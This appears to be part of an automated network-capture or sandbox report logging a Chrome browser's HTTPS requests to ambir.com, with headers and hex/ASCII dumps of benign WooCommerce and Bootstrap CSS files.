                                                                                                                                                                                              2024-11-20 20:28:13 UTC1369INData Raw: 63 6f 6d 6d 65 72 63 65 2d 74 61 62 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 23 63 6f 6e 74 65 6e 74 20 64 69 76 2e 70 72 6f 64 75 63 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 74 61 62 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 74 61 62 73 7b 63 6c 65 61 72 3a 62 6f 74 68 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 63 6f 6e 74 65 6e 74 20 64 69 76 2e 70 72 6f 64 75 63 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 74 61 62 73 20 75 6c 2e 74 61 62 73 3a 3a 61 66 74 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 63 6f 6e 74 65 6e 74 20 64 69 76 2e 70 72 6f 64 75 63 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 74 61 62 73 20 75 6c 2e 74 61 62
                                                                                                                                                                                              Data Ascii: commerce-tabs,.woocommerce-page #content div.product .woocommerce-tabs,.woocommerce-page div.product .woocommerce-tabs{clear:both}.woocommerce #content div.product .woocommerce-tabs ul.tabs::after,.woocommerce #content div.product .woocommerce-tabs ul.tab
                                                                                                                                                                                              2024-11-20 20:28:13 UTC1369INData Raw: 2e 63 6f 6d 6d 65 6e 74 3a 3a 61 66 74 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 23 72 65 76 69 65 77 73 20 2e 63 6f 6d 6d 65 6e 74 3a 3a 62 65 66 6f 72 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 23 63 6f 6e 74 65 6e 74 20 64 69 76 2e 70 72 6f 64 75 63 74 20 23 72 65 76 69 65 77 73 20 2e 63 6f 6d 6d 65 6e 74 3a 3a 61 66 74 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 23 63 6f 6e 74 65 6e 74 20 64 69 76 2e 70 72 6f 64 75 63 74 20 23 72 65 76 69 65 77 73 20 2e 63 6f 6d 6d 65 6e 74 3a 3a 62 65 66 6f 72 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 23 72 65 76 69 65 77 73 20 2e 63 6f 6d 6d 65 6e 74 3a 3a 61 66 74 65 72 2c 2e 77 6f 6f
                                                                                                                                                                                              Data Ascii: .comment::after,.woocommerce div.product #reviews .comment::before,.woocommerce-page #content div.product #reviews .comment::after,.woocommerce-page #content div.product #reviews .comment::before,.woocommerce-page div.product #reviews .comment::after,.woo
                                                                                                                                                                                              2024-11-20 20:28:13 UTC1369INData Raw: 3a 62 6f 74 68 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 75 6c 2e 70 72 6f 64 75 63 74 73 20 6c 69 2e 6c 61 73 74 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 75 6c 2e 70 72 6f 64 75 63 74 73 20 6c 69 2e 6c 61 73 74 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 75 6c 2e 70 72 6f 64 75 63 74 73 2e 63 6f 6c 75 6d 6e 73 2d 31 20 6c 69 2e 70 72 6f 64 75 63 74 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 75 6c 2e 70 72 6f 64 75 63 74 73 2e 63 6f 6c 75 6d 6e 73 2d 31 20 6c 69 2e 70 72 6f 64 75 63 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 75 6c 2e 70 72 6f 64 75 63 74 73 2e 63 6f 6c 75 6d 6e 73 2d 32 20 6c 69 2e 70 72
                                                                                                                                                                                              Data Ascii: :both}.woocommerce ul.products li.last,.woocommerce-page ul.products li.last{margin-right:0}.woocommerce ul.products.columns-1 li.product,.woocommerce-page ul.products.columns-1 li.product{width:100%;margin-right:0}.woocommerce ul.products.columns-2 li.pr
                                                                                                                                                                                              2024-11-20 20:28:13 UTC1369INData Raw: 2d 6f 72 64 65 72 69 6e 67 7b 66 6c 6f 61 74 3a 72 69 67 68 74 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 69 6e 61 74 69 6f 6e 20 75 6c 2e 70 61 67 65 2d 6e 75 6d 62 65 72 73 3a 3a 61 66 74 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 69 6e 61 74 69 6f 6e 20 75 6c 2e 70 61 67 65 2d 6e 75 6d 62 65 72 73 3a 3a 62 65 66 6f 72 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 69 6e 61 74 69 6f 6e 20 75 6c 2e 70 61 67 65 2d 6e 75 6d 62 65 72 73 3a 3a 61 66 74 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 69 6e 61 74 69 6f 6e 20 75 6c 2e 70 61
                                                                                                                                                                                              Data Ascii: -ordering{float:right}.woocommerce .woocommerce-pagination ul.page-numbers::after,.woocommerce .woocommerce-pagination ul.page-numbers::before,.woocommerce-page .woocommerce-pagination ul.page-numbers::after,.woocommerce-page .woocommerce-pagination ul.pa
                                                                                                                                                                                              2024-11-20 20:28:13 UTC1369INData Raw: 6f 6c 6c 61 74 65 72 61 6c 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 2e 63 61 72 74 2d 63 6f 6c 6c 61 74 65 72 61 6c 73 7b 77 69 64 74 68 3a 31 30 30 25 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 63 61 72 74 2d 63 6f 6c 6c 61 74 65 72 61 6c 73 3a 3a 61 66 74 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 63 61 72 74 2d 63 6f 6c 6c 61 74 65 72 61 6c 73 3a 3a 62 65 66 6f 72 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 2e 63 61 72 74 2d 63 6f 6c 6c 61 74 65 72 61 6c 73 3a 3a 61 66 74 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 2e 63 61 72 74 2d 63 6f 6c 6c 61 74 65 72 61 6c 73 3a 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 20 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 77 6f 6f 63 6f 6d
                                                                                                                                                                                              Data Ascii: ollaterals,.woocommerce-page .cart-collaterals{width:100%}.woocommerce .cart-collaterals::after,.woocommerce .cart-collaterals::before,.woocommerce-page .cart-collaterals::after,.woocommerce-page .cart-collaterals::before{content:" ";display:table}.woocom


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              2192.168.2.549716141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:14 UTC617OUTGET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-9afea242.min.css HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:15 UTC477INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:14 GMT
                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:27:19 GMT
                                                                                                                                                                                              ETag: W/"673e2a07-7feac"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 2510
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f717e121a0b-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:15 UTC892INData Raw: 37 64 64 33 0d 0a 3a 72 6f 6f 74 7b 2d 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 3a 23 37 46 35 34 42 33 3b 2d 2d 77 63 2d 67 72 65 65 6e 3a 23 37 61 64 30 33 61 3b 2d 2d 77 63 2d 72 65 64 3a 23 61 30 30 3b 2d 2d 77 63 2d 6f 72 61 6e 67 65 3a 23 66 66 62 61 30 30 3b 2d 2d 77 63 2d 62 6c 75 65 3a 23 32 65 61 32 63 63 3b 2d 2d 77 63 2d 70 72 69 6d 61 72 79 3a 23 37 46 35 34 42 33 3b 2d 2d 77 63 2d 70 72 69 6d 61 72 79 2d 74 65 78 74 3a 77 68 69 74 65 3b 2d 2d 77 63 2d 73 65 63 6f 6e 64 61 72 79 3a 23 65 39 65 36 65 64 3b 2d 2d 77 63 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 3a 23 35 31 35 31 35 31 3b 2d 2d 77 63 2d 68 69 67 68 6c 69 67 68 74 3a 23 62 33 61 66 35 34 3b 2d 2d 77 63 2d 68 69 67 68 6c 69 67 68 2d 74 65 78 74 3a 77 68 69 74 65 3b 2d 2d 77 63 2d 63
                                                                                                                                                                                              Data Ascii: 7dd3:root{--woocommerce:#7F54B3;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#7F54B3;--wc-primary-text:white;--wc-secondary:#e9e6ed;--wc-secondary-text:#515151;--wc-highlight:#b3af54;--wc-highligh-text:white;--wc-c
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2f 61 73 73 65 74 73 2f 63 73 73 2f 2e 2e 2f 66 6f 6e 74 73 2f 57 6f 6f 43 6f 6d 6d 65 72 63 65 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 75 72 6c 28 68 74 74 70 73 3a 2f 2f 61 6d 62 69 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2f 61 73 73 65 74 73 2f 63 73 73 2f 2e 2e 2f 66 6f 6e 74 73 2f 57 6f 6f 43 6f 6d 6d 65 72 63 65 2e 74 74 66 29 20 66 6f 72 6d 61 74 28 22 74 72 75 65 74 79 70 65 22 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 73 74 6f 72 65 2d 6e 6f 74 69 63
                                                                                                                                                                                              Data Ascii: com/wp-content/plugins/woocommerce/assets/css/../fonts/WooCommerce.woff) format("woff"),url(https://ambir.com/wp-content/plugins/woocommerce/assets/css/../fonts/WooCommerce.ttf) format("truetype");font-weight:400;font-style:normal}.woocommerce-store-notic
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 73 65 2d 69 6e 2d 6f 75 74 20 69 6e 66 69 6e 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 61 6d 62 69 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2f 61 73 73 65 74 73 2f 63 73 73 2f 2e 2e 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 73 2f 6c 6f 61 64 65 72 2e 73 76 67 29 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 3b 63 6f 6c 6f 72 3a 72 67 62 28 30 20 30 20 30 20 2f 20 2e 37 35 29 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2e 72 65 6d 6f 76 65 7b 64 69 73 70 6c 61
                                                                                                                                                                                              Data Ascii: se-in-out infinite;background:url(https://ambir.com/wp-content/plugins/woocommerce/assets/css/../images/icons/loader.svg) center center;background-size:cover;line-height:1;text-align:center;font-size:2em;color:rgb(0 0 0 / .75)}.woocommerce a.remove{displa
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 31 2e 36 31 38 65 6d 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 64 69 76 2e 69 6d 61 67 65 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 65 6d 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 64 69 76 2e 69 6d 61 67 65 73 20 69 6d 67 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 64 69 76 2e 69 6d 61 67 65 73 20 64 69 76 2e 74 68 75 6d 62 6e 61 69 6c 73 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 65 6d 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 64 69 76 2e 69 6d 61 67
                                                                                                                                                                                              Data Ascii: 1.618em}.woocommerce div.product div.images{margin-bottom:2em}.woocommerce div.product div.images img{display:block;width:100%;height:auto;box-shadow:none}.woocommerce div.product div.images div.thumbnails{padding-top:1em}.woocommerce div.product div.imag
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 3b 68 65 69 67 68 74 3a 38 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 30 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 36 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 39 70 78 3b 6c 65 66 74 3a 32 32 70 78 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 34 35 64 65 67 29 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 64 69 76 2e 69 6d 61 67 65 73 20 2e 66 6c 65 78 2d 63 6f 6e 74 72 6f 6c 2d 74 68 75 6d 62 73 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 7a 6f 6f 6d 3a 31 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20
                                                                                                                                                                                              Data Ascii: ;height:8px;background:#000;border-radius:6px;position:absolute;top:19px;left:22px;transform:rotate(-45deg);box-sizing:content-box}.woocommerce div.product div.images .flex-control-thumbs{overflow:hidden;zoom:1;margin:0;padding:0}.woocommerce div.product
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 2d 74 61 62 73 20 75 6c 2e 74 61 62 73 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 20 30 20 30 20 31 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 36 31 38 65 6d 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 74 61 62 73 20 75 6c 2e 74 61 62 73 20 6c 69 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 66 63 38 64 38 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 39 65 36 65 64 3b 63 6f 6c 6f 72 3a 23 35 31 35 31 35 31 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69
                                                                                                                                                                                              Data Ascii: -tabs ul.tabs{list-style:none;padding:0 0 0 1em;margin:0 0 1.618em;overflow:hidden;position:relative}.woocommerce div.product .woocommerce-tabs ul.tabs li{border:1px solid #cfc8d8;background-color:#e9e6ed;color:#515151;display:inline-block;position:relati
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 74 61 62 73 20 75 6c 2e 74 61 62 73 20 6c 69 3a 3a 61 66 74 65 72 7b 72 69 67 68 74 3a 2d 35 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 34 70 78 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 20 30 20 31 70 78 20 31 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 2d 32 70 78 20 32 70 78 20 30 20 23 65 39 65 36 65 64 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 74 61 62 73 20 75 6c 2e 74 61 62 73 3a 3a 62 65 66 6f 72 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 63 6f 6e 74 65 6e 74 3a 22 20 22 3b 77 69 64 74 68 3a 31 30 30 25 3b 62 6f
                                                                                                                                                                                              Data Ascii: commerce div.product .woocommerce-tabs ul.tabs li::after{right:-5px;border-bottom-left-radius:4px;border-width:0 0 1px 1px;box-shadow:-2px 2px 0 #e9e6ed}.woocommerce div.product .woocommerce-tabs ul.tabs::before{position:absolute;content:" ";width:100%;bo
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 66 6f 72 6d 2e 63 61 72 74 20 2e 76 61 72 69 61 74 69 6f 6e 73 20 6c 61 62 65 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 66 6f 72 6d 2e 63 61 72 74 20 2e 76 61 72 69 61 74 69 6f 6e 73 20 73 65 6c 65 63 74 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 37 35 25 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 65 6d 3b 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e
                                                                                                                                                                                              Data Ascii: rtical-align:top}.woocommerce div.product form.cart .variations label{font-weight:700;text-align:left}.woocommerce div.product form.cart .variations select{max-width:100%;min-width:75%;display:inline-block;margin-right:1em;appearance:none;-webkit-appearan
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 6f 64 75 63 74 20 66 6f 72 6d 2e 63 61 72 74 20 2e 67 72 6f 75 70 5f 74 61 62 6c 65 20 74 64 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 35 65 6d 3b 62 6f 72 64 65 72 3a 30 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 66 6f 72 6d 2e 63 61 72 74 20 2e 67 72 6f 75 70 5f 74 61 62 6c 65 20 74 64 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 77 69 64 74 68 3a 34 65 6d 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 64 69 76 2e 70 72 6f 64 75 63 74 20 66 6f 72 6d 2e 63 61 72 74 20 2e 67 72 6f 75 70 5f 74 61 62 6c 65 20 2e 77 63 2d 67 72 6f 75 70 65 64 2d 70 72 6f 64 75 63 74 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2d 63 68 65 63
                                                                                                                                                                                              Data Ascii: oduct form.cart .group_table td{vertical-align:top;padding-bottom:.5em;border:0}.woocommerce div.product form.cart .group_table td:first-child{width:4em;text-align:center}.woocommerce div.product form.cart .group_table .wc-grouped-product-add-to-cart-chec
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 75 63 74 20 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 75 6c 2e 70 72 6f 64 75 63 74 73 20 6c 69 2e 70 72 6f 64 75 63 74 20 61 20 69 6d 67 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 75 6c 2e 70 72 6f 64 75 63 74 73 20 6c 69 2e 70 72 6f 64 75 63 74 20 73 74 72 6f 6e 67 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 75 6c 2e 70 72 6f 64 75 63 74 73 20 6c 69 2e 70 72 6f 64 75 63 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 6c 61 63 65 68 6f 6c 64 65 72 7b
                                                                                                                                                                                              Data Ascii: uct a{text-decoration:none}.woocommerce ul.products li.product a img{width:100%;height:auto;display:block;margin:0 0 1em;box-shadow:none}.woocommerce ul.products li.product strong{display:block}.woocommerce ul.products li.product .woocommerce-placeholder{


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              3192.168.2.549718141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:14 UTC582OUTGET /wp-content/themes/ambir/css/bootstrap.min.css HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:15 UTC478INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:14 GMT
                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Tue, 03 Oct 2023 15:58:06 GMT
                                                                                                                                                                                              ETag: W/"651c3a0e-1d9ac"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 13802
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f717a9d8c23-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:15 UTC891INData Raw: 37 64 64 32 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 33 2e 33 2e 36 20 28 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 35 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 33 2e 30 2e 33 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 68 74 6d 6c 7b
                                                                                                                                                                                              Data Ascii: 7dd2/*! * Bootstrap v3.3.6 (http://getbootstrap.com) * Copyright 2011-2015 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{
